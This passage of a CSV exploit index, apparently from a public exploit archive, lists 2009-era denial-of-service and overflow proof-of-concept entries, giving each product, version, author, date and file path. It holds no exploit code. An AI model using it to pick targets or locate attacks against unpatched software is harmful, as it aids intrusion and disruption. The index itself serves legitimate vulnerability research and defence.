Overflow Crash (PoC)",2009-05-29,"Saint Patrick",multiple,dos, -8832,exploits/windows/dos/8832.php,"ICQ 6.5 - URL Search Hook (Windows Explorer) Remote Buffer Overflow (PoC)",2009-06-01,Nine:Situations:Group,windows,dos, -8837,exploits/windows/dos/8837.txt,"AIMP 2.51 build 330 - ID3v1/ID3v2 Tag Remote Stack Buffer Overflow (PoC) (SEH)",2009-06-01,LiquidWorm,windows,dos, -8842,exploits/multiple/dos/8842.pl,"Apache mod_dav / svn - Remote Denial of Service",2009-06-01,kingcope,multiple,dos, -8862,exploits/windows/dos/8862.txt,"Apple QuickTime - Image Description Atom Sign Extension (PoC)",2009-06-03,webDEViL,windows,dos, -8873,exploits/multiple/dos/8873.c,"OpenSSL < 0.9.8i - DTLS ChangeCipherSpec Remote Denial of Service",2009-06-04,"Jon Oberheide",multiple,dos, -8899,exploits/windows/dos/8899.txt,"SAP GUI 6.4 - ActiveX (Accept) Remote Buffer Overflow (PoC)",2009-06-08,DSecRG,windows,dos, -8940,exploits/multiple/dos/8940.pl,"Asterisk IAX2 - Attacked IAX Fuzzer Resource Exhaustion (Denial of Service)",2009-06-12,"Blake Cornell",multiple,dos, -8955,exploits/linux/dos/8955.pl,"LinkLogger 2.4.10.15 - 'syslog' Denial of Service",2009-06-15,h00die,linux,dos, -8957,exploits/multiple/dos/8957.txt,"Apple Safari / QuickTime - Denial of Service",2009-06-15,"Thierry Zoller",multiple,dos, -8960,exploits/linux/dos/8960.py,"Apple QuickTime - CRGN Atom Local Crash",2009-06-15,webDEViL,linux,dos, -8964,exploits/hardware/dos/8964.txt,"NETGEAR DG632 Router - Remote Denial of Service",2009-06-15,"Tom Neaves",hardware,dos, -8971,exploits/windows/dos/8971.pl,"Carom3D 5.06 - Unicode Buffer Overrun/Denial of Service",2009-06-16,LiquidWorm,windows,dos, -8976,exploits/multiple/dos/8976.pl,"Multiple HTTP Server - 'slowloris.pl' Low Bandwidth Denial of Service",2009-06-17,RSnake,multiple,dos, -8982,exploits/linux/dos/8982.txt,"Compface 1.5.2 - '.xbm' Local Buffer Overflow (PoC)",2009-06-17,metalhoney,linux,dos, -8991,exploits/multiple/dos/8991.php,"Multiple HTTP Server - Low Bandwidth Denial of Service (2)",2009-06-22,evilrabbi,multiple,dos, -9006,exploits/windows/dos/9006.py,"HP Data Protector 4.00-SP1b43064 - Remote Memory Leak/Denial of Service",2009-06-23,Nibin,windows,dos, -9007,exploits/windows/dos/9007.rb,"HP Data Protector 4.00-SP1b43064 - Remote Memory Leak/Denial of Service (Metasploit)",2009-06-23,Nibin,windows,dos, -9029,exploits/windows/dos/9029.rb,"VideoLAN VLC Media Player 0.9.9 - 'smb://' URI Stack Buffer Overflow (PoC)",2009-06-29,Trancer,windows,dos, -9033,exploits/windows/dos/9033.pl,"SCMPX 1.5.1 - '.m3u' Local Heap Overflow (PoC)",2009-06-29,hack4love,windows,dos, -9061,exploits/windows/dos/9061.pl,"PEamp 1.02b - '.m3u' Local Buffer Overflow (PoC)",2009-07-01,"ThE g0bL!N",windows,dos, -9067,exploits/hardware/dos/9067.py,"ARD-9808 DVR Card Security Camera - GET Remote Denial of Service",2009-07-01,Stack,hardware,dos, -9071,exploits/multiple/dos/9071.txt,"Apple Safari 4.x - JavaScript Reload Remote Crash",2009-07-02,SkyOut,multiple,dos, -9084,exploits/windows/dos/9084.txt,"Soulseek 157 NS < 13e/156.x - Remote Peer Search Code Execution (PoC)",2009-07-09,"laurent gaffié",windows,dos, -9085,exploits/multiple/dos/9085.txt,"MySQL 5.0.45 - Authenticated COM_CREATE_DB Format String (PoC)",2009-07-09,kingcope,multiple,dos, -9090,exploits/windows/dos/9090.pl,"otsAV DJ 1.85.064 - '.ofl' Local Heap Overflow (PoC)",2009-07-09,hack4love,windows,dos, -9100,exploits/windows/dos/9100.html,"Microsoft Internet Explorer - 'AddFavorite' Remote Crash (PoC)",2009-07-09,Sberry,windows,dos, -9102,exploits/windows/dos/9102.pl,"PatPlayer 3.9 - '.m3u' Local Heap Overflow (PoC)",2009-07-10,Cyber-Zone,windows,dos, -9113,exploits/windows/dos/9113.txt,"otsAV DJ/TV/Radio - Multiple Local Heap Overflows (PoC)",2009-07-10,Stack,windows,dos, -9114,exploits/windows/dos/9114.txt,"eEye Retina WiFi Security Scanner 1.0 - '.rws Parsing' Buffer Overflow (PoC)",2009-07-10,LiquidWorm,windows,dos, -9116,exploits/windows/dos/9116.html,"AwingSoft Web3D Player - 'WindsPly.ocx' Remote Buffer Overflow (PoC)",2009-07-10,shinnai,windows,dos, -9123,exploits/windows/dos/9123.pl,"M3U/M3L to ASX/WPL 1.1 - '.asx' / '.m3u' / '.m3l' Local Buffer Overflow (PoC)",2009-07-11,"ThE g0bL!N",windows,dos, -9124,exploits/windows/dos/9124.pl,"Playlistmaker 1.5 - '.m3u' / '.M3L' / '.TXT' Local Stack Overflow (PoC)",2009-07-11,"ThE g0bL!N",windows,dos, -9131,exploits/windows/dos/9131.py,"Tandberg MXP F7.0 - 'USER' Remote Buffer Overflow (PoC)",2009-07-13,otokoyama,windows,dos, -9133,exploits/windows/dos/9133.pl,"ScITE Editor 1.72 - Local Crash",2009-07-13,prodigy,windows,dos, -9134,exploits/freebsd/dos/9134.c,"FreeBSD 6/8 - ata Device Local Denial of Service",2009-07-13,"Shaun Colley",freebsd,dos, -9139,exploits/windows/dos/9139.pl,"JetAudio 7.5.3 COWON Media Center - '.wav' Crash",2009-07-14,prodigy,windows,dos, -9141,exploits/windows/dos/9141.pl,"Icarus 2.0 - '.ICP' Local Stack Overflow (PoC)",2009-07-14,"ThE g0bL!N",windows,dos, -9147,exploits/windows/dos/9147.pl,"MixVibes Pro 7.043 - '.vib' Local Stack Overflow (PoC)",2009-07-14,hack4love,windows,dos, -9157,exploits/windows/dos/9157.pl,"Hamster Audio Player 0.3a - Local Buffer Overflow (PoC)",2009-07-15,"ThE g0bL!N",windows,dos, -9158,exploits/windows/dos/9158.html,"Mozilla Firefox 3.5 - Unicode Remote Buffer Overflow (PoC)",2009-07-15,"Andrew Haynes",windows,dos, -9160,exploits/multiple/dos/9160.txt,"Multiple Browsers - Denial of Service",2009-07-15,"Thierry Zoller",multiple,dos, -9163,exploits/windows/dos/9163.txt,"Microsoft Office Web Components (OWC) Spreadsheet - ActiveX Buffer Overflow (PoC)",2009-07-16,anonymous,windows,dos, -9167,exploits/windows/dos/9167.txt,"Music Tag Editor 1.61 build 212 - Remote Buffer Overflow (PoC)",2009-07-16,LiquidWorm,windows,dos, -9168,exploits/windows/dos/9168.pl,"Zortam MP3 Player 1.50 - '.m3u' Integer Division by Zero",2009-07-16,LiquidWorm,windows,dos, -9169,exploits/windows/dos/9169.txt,"Zortam MP3 Media Studio 9.40 - Multiple Memory Corruption Vulnerabilities",2009-07-16,LiquidWorm,windows,dos, -9170,exploits/windows/dos/9170.txt,"Audio Editor Pro 2.91 - Remote Memory Corruption (PoC)",2009-07-16,LiquidWorm,windows,dos, -9173,exploits/windows/dos/9173.pl,"MultiMedia Jukebox 4.0 Build 020124 - '.pst' / '.m3u' Heap Overflow (PoC)",2009-07-16,hack4love,windows,dos, -9175,exploits/multiple/dos/9175.txt,"Sguil/PADS - Remote Server Crash",2009-07-17,Ataraxia,multiple,dos, -9178,exploits/windows/dos/9178.pl,"MixSense 1.0.0.1 DJ Studio - '.mp3' Crash",2009-07-16,prodigy,windows,dos, -9189,exploits/windows/dos/9189.pl,"Streaming Audio Player 0.9 - 'skin' Local Stack Overflow (PoC) (SEH)",2009-07-17,"ThE g0bL!N",windows,dos, -9192,exploits/windows/dos/9192.pl,"Soritong MP3 Player 1.0 - 'SKIN' Local Stack Overflow (PoC) (SEH)",2009-07-17,"ThE g0bL!N",windows,dos, -9198,exploits/multiple/dos/9198.txt,"Real Helix DNA - 'RTSP' / 'SETUP' Request Handler",2009-07-17,"Core Security",multiple,dos, -9200,exploits/windows/dos/9200.pl,"EpicVJ 1.2.8.0 - '.mpl' / '.m3u' Local Heap Overflow (PoC)",2009-07-20,hack4love,windows,dos, -9206,exploits/freebsd/dos/9206.c,"FreeBSD 7.2 - 'pecoff' Local Denial of Service",2009-07-20,"Shaun Colley",freebsd,dos, -9212,exploits/windows/dos/9212.pl,"Acoustica MP3 Audio Mixer 2.471 - '.sgp' Crash",2009-07-20,prodigy,windows,dos, -9213,exploits/windows/dos/9213.pl,"Acoustica MP3 Audio Mixer 2.471 - '.m3u' Local Heap Overflow (PoC)",2009-07-20,"D3V!L FUCK3R",windows,dos, -9220,exploits/windows/dos/9220.pl,"KMplayer 2.9.4.1433 - '.srt' Local Buffer Overflow (PoC)",2009-07-20,b3hz4d,windows,dos, -9222,exploits/windows/dos/9222.cpp,"FlyHelp - '.CHM' Local Buffer Overflow (PoC)",2009-07-21,"fl0 fl0w",windows,dos, -9228,exploits/windows/dos/9228.pl,"otsAV 1.77.001 - '.ofl' Local Heap Overflow (PoC)",2009-07-22,hack4love,windows,dos, -9240,exploits/windows/dos/9240.py,"OpenH323 Opal SIP Protocol - Remote Denial of Service",2009-07-24,"Jose Miguel Esparza",windows,dos, -9241,exploits/windows/dos/9241.py,"Ekiga 2.0.5 - 'GetHostAddress' Remote Denial of Service",2009-07-24,"Jose Miguel Esparza",windows,dos, -9242,exploits/windows/dos/9242.py,"WzdFTPD 8.0 - Remote Denial of Service",2009-07-24,"Jose Miguel Esparza",windows,dos, -9253,exploits/windows/dos/9253.html,"Microsoft Internet Explorer 7/8 - findText Unicode Parsing Crash",2009-07-24,Hong10,windows,dos, -9264,exploits/linux/dos/9264.py,"stftp 1.10 - PWD Response Remote Stack Overflow (PoC)",2009-07-27,sqlevil,linux,dos, -9265,exploits/linux/dos/9265.c,"ISC DHCP dhclient < 3.1.2p1 - Remote Buffer Overflow (PoC)",2009-07-27,"Jon Oberheide",linux,dos, -9268,exploits/hardware/dos/9268.rb,"Cisco WLC 4402 - Basic Auth Remote Denial of Service (Metasploit)",2009-07-27,"Christoph Bott",hardware,dos, -9277,exploits/windows/dos/9277.pl,"MP3 Studio 1.0 - '.mpf' / '.m3u' Local Stack Overflow (PoC)",2009-07-27,hack4love,windows,dos, -9295,exploits/windows/dos/9295.txt,"Firebird SQL - op_connect_request main listener shutdown",2009-07-28,"Core Security",windows,dos, -9300,exploits/multiple/dos/9300.c,"ISC BIND 9 - Remote Dynamic Update Message Denial of Service (PoC)",2009-07-30,kingcope,multiple,dos, -9304,exploits/windows/dos/9304.txt,"Epiri Professional Web Browser 3.0 - Remote Crash",2009-07-30,LiquidWorm,windows,dos, -9317,exploits/windows/dos/9317.c,"Google SketchUp Pro 7.0 - '.skp' Remote Stack Overflow (PoC)",2009-08-01,LiquidWorm,windows,dos, -9323,exploits/multiple/dos/9323.txt,"Sun xVM VirtualBox 2.2 < 3.0.2 r49928 - Local Host Reboot (Denial of Service) (PoC)",2009-08-01,"Tadas Vilkeliskis",multiple,dos, -9345,exploits/windows/dos/9345.pl,"RadASM 2.2.1.5 - '.mnu' Local Format String (PoC)",2009-08-03,SkuLL-HackeR,windows,dos, -9359,exploits/windows/dos/9359.pl,"jetAudio 7.1.9.4030 plus vx - '.m3u' Local Buffer Overflow (PoC)",2009-08-04,hack4love,windows,dos, -9361,exploits/windows/dos/9361.pl,"RadASM 2.2.1.6 Menu Editor - '.mnu' Stack Overflow (PoC)",2009-08-04,"Pankaj Kohli",windows,dos, -9362,exploits/windows/dos/9362.html,"Microsoft Internet Explorer 8.0.7100.0 - Simple HTML Remote Crash (PoC)",2009-08-05,schnuddelbuddel,windows,dos, -9364,exploits/windows/dos/9364.py,"Tuniac 090517c - '.m3u' Local File Crash (PoC)",2009-08-05,Dr_IDE,windows,dos, -9368,exploits/windows/dos/9368.pl,"UltraPlayer Media Player 2.112 - Local Buffer Overflow (PoC)",2009-08-05,SarBoT511,windows,dos, -9373,exploits/freebsd/dos/9373.c,"FreeBSD 7.2-RELEASE - SCTP Local Kernel Denial of Service",2009-08-06,"Shaun Colley",freebsd,dos, -9376,exploits/windows/dos/9376.py,"jetAudio 7.5.5 plus vx - '.M3U'/'.ASX'/'.WAX'/'.WVX' Local Crash (PoC)",2009-09-10,Dr_IDE,windows,dos, -9381,exploits/windows/dos/9381.py,"Groovy Media Player 1.2.0 - '.m3u' Local Buffer Overflow (PoC)",2009-08-06,"opt!x hacker",windows,dos, -9382,exploits/windows/dos/9382.txt,"ImTOO MPEG Encoder 3.1.53 - '.cue' / '.m3u' Local Buffer Overflow (PoC)",2009-08-06,"opt!x hacker",windows,dos, -9392,exploits/windows/dos/9392.pl,"iRehearse - '.m3u' Local Buffer Overflow (PoC)",2009-08-07,"opt!x hacker",windows,dos, -9393,exploits/windows/dos/9393.pl,"FoxPlayer 1.1.0 - '.m3u' Local Buffer Overflow (PoC)",2009-08-07,"opt!x hacker",windows,dos, -9401,exploits/windows/dos/9401.py,"SpiceWorks 3.6 - 'Accept' Overflow Crash",2009-08-07,"David Kennedy (ReL1K)",windows,dos, -9411,exploits/windows/dos/9411.cpp,"Embedthis Appweb 3.0b.2-4 - Remote Buffer Overflow (PoC)",2009-08-11,"fl0 fl0w",windows,dos, -9417,exploits/windows/dos/9417.txt,"Microsoft Windows Server 2003 - '.EOT' Blue Screen of Death Crash",2009-08-11,webDEViL,windows,dos, -9423,exploits/windows/dos/9423.pl,"Microsoft Wordpad on winXP SP3 - Local Crash",2009-08-12,murderkey,windows,dos, -9427,exploits/windows/dos/9427.py,"VideoLAN VLC Media Player 1.0.0/1.0.1 - 'smb://' URI Handling Buffer Overflow (PoC)",2009-08-13,Dr_IDE,windows,dos, -9429,exploits/windows/dos/9429.py,"EmbedThis Appweb 3.0B.2-4 - Multiple Remote Buffer Overflows (PoC)",2009-08-13,Dr_IDE,windows,dos, -9442,exploits/linux/dos/9442.c,"Linux Kernel < 2.6.30.5 - 'cfg80211' Remote Denial of Service",2009-08-18,"Jon Oberheide",linux,dos, -9446,exploits/windows/dos/9446.cpp,"HTML Email Creator & Sender 2.3 - Local Buffer Overflow (PoC) (SEH)",2009-08-18,"fl0 fl0w",windows,dos, -9449,exploits/windows/dos/9449.txt,"TheGreenBow VPN Client - 'tgbvpn.sys' Local Denial of Service",2009-08-18,Evilcry,windows,dos, -9454,exploits/multiple/dos/9454.txt,"Apple Safari 4.0.2 - WebKit Parsing of Floating Point Numbers Buffer Overflow (PoC)",2009-08-18,"Leon Juranic",multiple,dos, -9455,exploits/windows/dos/9455.html,"Microsoft Internet Explorer - JavaScript SetAttribute Remote Crash",2009-08-18,"Irfan Asrar",windows,dos, -9457,exploits/windows/dos/9457.pl,"broid 1.0 Beta 3a - '.mp3' Local Buffer Overflow (PoC)",2009-08-18,hack4love,windows,dos, -9467,exploits/windows/dos/9467.pl,"KOL Player 1.0 - '.mp3' Local Buffer Overflow (PoC)",2009-08-18,Evil.Man,windows,dos, -9478,exploits/windows/dos/9478.pl,"BugHunter HTTP Server 1.6.2 - 'httpsv.exe' GET 404 Remote Denial of Service",2007-06-21,Prili,windows,dos,80 -9480,exploits/windows/dos/9480.html,"GDivX Zenith Player AviFixer Class - 'fix.dll 1.0.0.1' Buffer Overflow (PoC)",2007-05-09,rgod,windows,dos, -9487,exploits/windows/dos/9487.pl,"Faslo Player 7.0 - '.m3u' Local Buffer Overflow (PoC)",2009-08-24,hack4love,windows,dos, -9496,exploits/windows/dos/9496.txt,"War-FTPD 1.65 - MKD/CD Requests Denial of Service",2009-08-24,"opt!x hacker",windows,dos, -9506,exploits/windows/dos/9506.pl,"FLIP Flash Album Deluxe 1.8.407.1 - '.fft' Crash (PoC)",2009-08-24,the_Edit0r,windows,dos, -9507,exploits/windows/dos/9507.pl,"AiO (All into One) Flash Mixer 3 - '.afp' Crash (PoC)",2009-08-24,the_Edit0r,windows,dos, -9514,exploits/hardware/dos/9514.py,"Xerox WorkCentre (Multiple Models) - Denial of Service",2009-08-25,"Henri Lindberg",hardware,dos, -9515,exploits/windows/dos/9515.txt,"Cerberus FTP 3.0.1 - 'ALLO' Remote Overflow Denial of Service (Metasploit)",2009-08-25,"Francis Provencher",windows,dos, -9516,exploits/windows/dos/9516.txt,"Novell Client for Windows 2000/XP - ActiveX Remote Denial of Service",2009-08-25,"Francis Provencher",windows,dos, -9517,exploits/windows/dos/9517.txt,"Lotus note connector for BlackBerry Manager 5.0.0.11 - ActiveX Denial of Service",2009-08-25,"Francis Provencher",windows,dos, -9528,exploits/windows/dos/9528.py,"TFTPUtil GUI 1.3.0 - Remote Denial of Service",2009-08-26,"ThE g0bL!N",windows,dos, -9537,exploits/windows/dos/9537.html,"Kaspersky 2010 - Remote Memory Corruption / Denial of Service (PoC)",2009-08-28,"Prakhar Prasad",windows,dos, -9539,exploits/windows/dos/9539.py,"uTorrent 1.8.3 Build 15772 - Create New Torrent Buffer Overflow (PoC)",2009-08-28,Dr_IDE,windows,dos, -9546,exploits/windows/dos/9546.pl,"Swift Ultralite 1.032 - '.m3u' Local Buffer Overflow (PoC)",2009-08-31,hack4love,windows,dos, -9547,exploits/windows/dos/9547.pl,"SolarWinds TFTP Server 9.2.0.111 - Remote Denial of Service",2009-08-31,"Gaurav Baruah",windows,dos, -9549,exploits/windows/dos/9549.c,"MailEnable 1.52 - HTTP Mail Service Stack Buffer Overflow (PoC)",2009-08-31,"fl0 fl0w",windows,dos, -9554,exploits/windows/dos/9554.html,"Apple iPhone 2.2.1/3.x - MobileSafari Crash + Reboot (Denial of Service)",2009-08-31,TheLeader,windows,dos, -9561,exploits/windows/dos/9561.py,"AIMP2 Audio Converter 2.53b330 - '.pls' / '.m3u' Unicode Crash (PoC)",2009-09-01,mr_me,windows,dos, -9573,exploits/windows/dos/9573.pl,"dTunes 2.72 - Filename Processing Local Format String (PoC)",2009-09-01,TheLeader,windows,dos, -9584,exploits/windows/dos/9584.txt,"PPstream 2.6.86.8900 - PPSMediaList ActiveX Remote Buffer Overflow (PoC) (1)",2009-09-03,"expose 0day",windows,dos, -9585,exploits/windows/dos/9585.txt,"PPstream 2.6.86.8900 - PPSMediaList ActiveX Remote Buffer Overflow (PoC) (2)",2009-09-03,"expose 0day",windows,dos, -9587,exploits/windows/dos/9587.txt,"Microsoft IIS 5.0/6.0 FTP Server - Stack Exhaustion Denial of Service",2009-09-04,kingcope,windows,dos, -9594,exploits/windows/dos/9594.txt,"Microsoft Windows Vista/7 - SMB2.0 Negotiate Protocol Request Remote Blue Screen of Death (MS07-063)",2009-09-09,"laurent gaffie",windows,dos, -9597,exploits/windows/dos/9597.txt,"Novell eDirectory 8.8 SP5 - Remote Denial of Service",2009-09-09,karak0rsan,windows,dos, -9606,exploits/win_x86/dos/9606.pl,"Apple Safari 3.2.3 (Windows x86) - JavaScript 'eval' Remote Denial of Service",2009-09-09,"Jeremy Brown",win_x86,dos, -9607,exploits/windows/dos/9607.pl,"Ipswitch WS_FTP 12 Professional - Remote Format String (PoC)",2009-09-09,"Jeremy Brown",windows,dos, -9617,exploits/windows/dos/9617.txt,"Dnsmasq < 2.50 - Heap Overflow / Null Pointer Dereference",2009-09-09,"Core Security",windows,dos, -9620,exploits/windows/dos/9620.pl,"Media Player Classic 6.4.9 - '.mid' Integer Overflow (PoC)",2009-09-09,PLATEN,windows,dos, -9621,exploits/windows/dos/9621.txt,"Kolibri+ Web Server 2 - GET Denial of Service",2009-09-10,"Usman Saeed",windows,dos, -9622,exploits/windows/dos/9622.py,"WarFTPd 1.82.00-RC12 - LIST command Format String Denial of Service",2009-09-10,corelanc0d3r,windows,dos, -9626,exploits/windows/dos/9626.py,"INMATRIX Zoom Player Pro 6.0.0 - '.mid' Integer Overflow (PoC)",2009-09-10,Dr_IDE,windows,dos, -9642,exploits/multiple/dos/9642.py,"FreeRadius < 1.1.8 - Zero-Length Tunnel-Password Denial of Service",2009-09-11,"Matthew Gillespie",multiple,dos,1812 -9646,exploits/hardware/dos/9646.php,"Siemens Gigaset SE361 WLAN - Remote Reboot (Denial of Service)",2009-09-11,crashbrz,hardware,dos, -9657,exploits/windows/dos/9657.pl,"httpdx 1.4 - HTTP Server Host Header Remote Format String Denial of Service",2009-09-14,"Pankaj Kohli",windows,dos, -9664,exploits/windows/dos/9664.py,"FtpXQ FTP Server 3.0 - Authenticated Remote Denial of Service",2009-09-14,PLATEN,windows,dos, -9666,exploits/hardware/dos/9666.php,"Apple Safari IPhone - using tel: Remote Crash",2009-09-14,cloud,hardware,dos, -9667,exploits/windows/dos/9667.c,"Cerberus FTP Server 3.0.3 - Remote Denial of Service",2009-09-14,"Single Eye",windows,dos, -9668,exploits/windows/dos/9668.txt,"Batch Picture Watemark 1.0 - '.jpg' Local Crash (PoC)",2009-09-14,the_Edit0r,windows,dos, -9670,exploits/windows/dos/9670.txt,"FotoTagger 2.12.0.0 - '.XML' Buffer Overflow (PoC)",2009-09-14,the_Edit0r,windows,dos, -9671,exploits/windows/dos/9671.py,"Tuniac 090517c - '.pls' Local Crash (PoC)",2009-09-14,zAx,windows,dos, -9672,exploits/windows/dos/9672.py,"PowerISO 4.0 - Local Buffer Overflow (PoC)",2009-09-14,Dr_IDE,windows,dos, -9677,exploits/windows/dos/9677.c,"HERO SUPER PLAYER 3000 - '.m3u' Buffer Overflow (PoC)",2009-09-15,"fl0 fl0w",windows,dos, -9682,exploits/windows/dos/9682.txt,"Adobe Shockwave Player 11.5.1.601 - ActiveX Buffer Overflow (PoC)",2009-09-15,"Francis Provencher",windows,dos, -9683,exploits/windows/dos/9683.txt,"Novell Groupwise Client 7.0.3.1294 - ActiveX Denial of Service (PoC)",2009-09-15,"Francis Provencher",windows,dos, -9684,exploits/windows/dos/9684.txt,"EasyMail Quicksoft 6.0.2.0 - ActiveX Remote Code Execution (PoC)",2009-09-15,"Francis Provencher",windows,dos, -9685,exploits/windows/dos/9685.txt,"EasyMail Quicksoft 6.0.2.0 - CreateStore ActiveX Code Execution (PoC)",2009-09-15,"Francis Provencher",windows,dos, -9686,exploits/windows/dos/9686.py,"VideoLAN VLC Media Player < 0.9.6 - 'CUE' Local Buffer Overflow (PoC)",2009-09-15,Dr_IDE,windows,dos, -9689,exploits/windows/dos/9689.pl,"MP3 Collector 2.3 - '.m3u' Local Crash (PoC)",2009-09-15,zAx,windows,dos, -9691,exploits/windows/dos/9691.pl,"DJ Studio Pro 4.2 - '.pls' Local Crash",2009-09-15,prodigy,windows,dos, -9695,exploits/windows/dos/9695.py,"BigAnt Server 2.50 SP1 - '.zip' Local Buffer Overflow (PoC)",2009-09-16,Dr_IDE,windows,dos, -9701,exploits/windows/dos/9701.c,"Notepad++ 5.4.5 - '.C' / '.CPP' Local Stack Buffer Overflow (PoC)",2009-09-16,"fl0 fl0w",windows,dos, -9707,exploits/windows/dos/9707.pl,"Ease Audio Cutter 1.20 - '.wav' Local Crash (PoC)",2009-09-17,zAx,windows,dos, -9717,exploits/windows/dos/9717.txt,"Xerver HTTP Server 4.32 - Remote Denial of Service",2009-09-18,Dr_IDE,windows,dos, -9731,exploits/multiple/dos/9731.txt,"Snort unified 1 IDS Logging - Alert Evasion & Logfile Corruption/Alert Falsify",2009-09-21,"Pablo Rincón Crespo",multiple,dos, -9734,exploits/windows/dos/9734.py,"BigAnt Server 2.50 SP6 - '.zip' Local Buffer Overflow (PoC) (2)",2009-09-21,Dr_IDE,windows,dos, -9804,exploits/windows/dos/9804.rb,"XM Easy Personal FTP Server 5.8.0 - Denial of Service (Metasploit)",2009-11-10,zhangmc,windows,dos,21 -9806,exploits/windows/dos/9806.html,"HP LoadRunner 9.5 - Remote file creation (PoC)",2009-09-29,pyrokinesis,windows,dos, -9811,exploits/windows/dos/9811.py,"Core FTP Server 1.0 build 304 - Denial of Service",2009-09-28,Dr_IDE,windows,dos,21 -9814,exploits/windows/dos/9814.py,"CDBurnerXP 4.2.4.1351 - Local Crash (Denial of Service)",2009-09-25,Dr_IDE,windows,dos, -9815,exploits/windows/dos/9815.py,"Core FTP LE 2.1 build 1612 - Local Buffer Overflow (PoC)",2009-09-25,Dr_IDE,windows,dos, -9817,exploits/windows/dos/9817.py,"CuteFTP 8.3.3 - 'create new site' Local Buffer Overflow (PoC)",2009-09-25,Dr_IDE,windows,dos, -9823,exploits/solaris/dos/9823.c,"Sun Solaris 10 RPC dmispd - Denial of Service",2009-09-24,"Jeremy Brown",solaris,dos, -9845,exploits/osx/dos/9845.c,"Apple Mac OSX 10.5.6/10.5.7 - ptrace mutex Denial of Service",2009-11-05,prdelka,osx,dos, -9852,exploits/windows/dos/9852.py,"Home FTP Server 1.10.1.139 - 'SITE INDEX' Remote Denial of Service",2009-11-16,zhangmc,windows,dos,21 -9871,exploits/windows/dos/9871.txt,"Boloto Media Player 1.0.0.9 - '.pls' File Denial of Service",2009-10-27,Dr_IDE,windows,dos, -9874,exploits/windows/dos/9874.txt,"Cherokee Web server 0.5.4 - Denial of Service",2009-10-26,"Usman Saeed",windows,dos, -9879,exploits/windows/dos/9879.txt,"EMC RepliStor Server 6.3.1.3 - Denial of Service",2009-10-20,bellick,windows,dos,7144 -9881,exploits/windows/dos/9881.txt,"Eureka Email Client 2.2q - Buffer Overflow (PoC)",2009-10-23,"Francis Provencher",windows,dos,110 -9901,exploits/linux/dos/9901.txt,"Nginx 0.7.0 < 0.7.61 / 0.6.0 < 0.6.38 / 0.5.0 < 0.5.37 / 0.4.0 < 0.4.14 - Denial of Service (PoC)",2009-10-23,"Zeus Penguin",linux,dos,80 -9956,exploits/hardware/dos/9956.txt,"Palm Pre WebOS 1.1 - Denial of Service",2009-10-14,"Townsend Harris",hardware,dos, -9969,exploits/multiple/dos/9969.txt,"Snort 2.8.5 - IPv6 Denial of Service",2009-10-23,"laurent gaffie",multiple,dos, -9971,exploits/windows/dos/9971.php,"Spider Solitaire - Denial of Service (PoC)",2009-10-15,SirGod,windows,dos, -9980,exploits/hardware/dos/9980.txt,"Websense Email Security - Denial of Service",2009-10-20,"Nikolas Sotiriu",hardware,dos, -9987,exploits/multiple/dos/9987.txt,"ZoIPer 2.22 - Call-Info Remote Denial of Service",2009-10-14,"Tomer Bitton",multiple,dos,5060 -9999,exploits/windows/dos/9999.txt,"Cerberus FTP server 3.0.6 - Unauthenticated Denial of Service",2009-09-30,"Francis Provencher",windows,dos,21 -10004,exploits/multiple/dos/10004.txt,"Dopewars Server 1.5.12 - Denial of Service",2009-10-06,"Doug Prostko",multiple,dos,7902 -10005,exploits/windows/dos/10005.py,"Microsoft Windows 7/2008 R2 - Remote Kernel Crash",2009-11-11,"laurent gaffie",windows,dos,445 -10017,exploits/linux/dos/10017.c,"Linux Kernel 2.6.x - 'fput()' Null Pointer Dereference Local Denial of Service",2009-11-09,"David Howells",linux,dos, -10022,exploits/linux/dos/10022.c,"Linux Kernel 2.6.31.4 - 'unix_stream_connect()' Local Denial of Service",2009-11-10,"Tomoki Sekiyama",linux,dos, -10062,exploits/windows/dos/10062.py,"Novell eDirectory 883ftf3 - nldap module Denial of Service",2009-11-16,ryujin,windows,dos,389 -10068,exploits/windows/dos/10068.rb,"Microsoft Windows Server 2000 < 2008 - Embedded OpenType Font Engine Remote Code Execution (MS09-065) (Metasploit)",2009-11-12,"H D Moore",windows,dos, -10073,exploits/windows/dos/10073.py,"XM Easy Personal FTP 5.8 - Denial of Service",2009-10-02,PLATEN,windows,dos,21 -10077,exploits/multiple/dos/10077.txt,"OpenLDAP 2.3.39 - MODRDN Remote Denial of Service",2009-11-09,"Ralf Haferkamp",multiple,dos,389 -33476,exploits/hardware/dos/33476.pl,"Juniper Networks JUNOS 7.1.1 - Malformed TCP Packet Denial of Service / Multiple Vulnerabilities",2010-01-07,anonymous,hardware,dos, -10091,exploits/windows/dos/10091.txt,"XLPD 3.0 - Remote Denial of Service",2009-10-06,"Francis Provencher",windows,dos,515 -10092,exploits/windows/dos/10092.txt,"Yahoo! Messenger 9.0.0.2162 - 'YahooBridgeLib.dll' ActiveX Control Remote Denial of Service",2009-11-12,HACKATTACK,windows,dos, -10100,exploits/windows/dos/10100.py,"FTPDMIN 0.96 - 'LIST' Remote Denial of Service",2007-03-20,shinnai,windows,dos,21 -10102,exploits/win_x86/dos/10102.pl,"Apple Safari 4.0.3 (Windows x86) - 'CSS' Remote Denial of Service (1)",2009-11-16,"Jeremy Brown",win_x86,dos,80 -10103,exploits/windows/dos/10103.txt,"Mozilla Thunderbird 2.0.0.23 Mozilla SeaMonkey 2.0 - 'jar50.dll' Null Pointer Dereference",2009-11-16,"Marcin Ressel",windows,dos, -10104,exploits/windows/dos/10104.py,"XM Easy Personal FTP Server - 'APPE' / 'DELE' Denial of Service",2009-11-13,zhangmc,windows,dos,21 -10106,exploits/windows/dos/10106.c,"Avast! 4.8.1351.0 AntiVirus - 'aswMon2.sys' Kernel Memory Corruption",2009-11-17,Giuseppe,windows,dos, -10160,exploits/windows/dos/10160.py,"FtpXQ 3.0 - Authenticated Remote Denial of Service",2009-11-17,"Marc Doudiet",windows,dos,21 -10163,exploits/windows/dos/10163.pl,"Novell eDirectory - HTTPSTK Login Stack Overflow",2009-11-17,karak0rsan,windows,dos,80 -10164,exploits/windows/dos/10164.c,"Kaspersky AV 2010 9.0.0.463 - Local Denial of Service",2009-09-29,Heurs,windows,dos, -10171,exploits/windows/dos/10171.py,"Baby Web Server 2.7.2 - found Denial of Service",2009-11-18,"Asheesh kumar Mani Tripathi",windows,dos,80 -10176,exploits/windows/dos/10176.txt,"HP OpenView Network Node Manager (OV NNM) 7.53 - Invalid DB Error Code",2009-11-17,"Core Security",windows,dos, -10182,exploits/hardware/dos/10182.py,"2WIRE Router 5.29.52 - Remote Denial of Service",2009-10-29,hkm,hardware,dos, -10184,exploits/linux/dos/10184.txt,"KDE KDELibs 4.3.3 - Remote Array 